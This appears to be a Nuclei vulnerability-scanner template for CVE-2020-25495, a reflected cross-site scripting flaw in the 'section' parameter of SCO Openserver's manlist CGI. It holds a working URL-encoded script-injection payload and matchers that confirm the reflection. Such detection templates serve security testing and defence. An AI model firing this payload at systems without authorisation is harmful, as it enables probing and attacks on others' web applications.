nuclei-templates/cves/2020/CVE-2020-25495.yaml

31 lines
874 B
YAML

id: CVE-2020-25495
info:
name: SCO Openserver 5.0.7 - 'section' Reflected XSS
author: 0x_Akoko
description: A reflected Cross-site scripting (XSS) vulnerability in Xinuo (formerly SCO) Openserver version 5 and 6 allows remote attackers to inject arbitrary web script or HTML tag via the parameter 'section'.
severity: medium
tags: cve,cve2020,sco,xss
reference: https://www.exploit-db.com/exploits/49300
requests:
- method: GET
path:
- '{{BaseURL}}/cgi-bin/manlist?section=%22%3E%3Ch1%3Ehello%3C%2Fh1%3E%3Cscript%3Ealert(/{{randstr}}/)%3C%2Fscript%3E'
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
words:
- "<h1>hello</h1><script>alert(/{{randstr}}/)</script>"
part: body
- type: word
words:
- "text/html"
part: header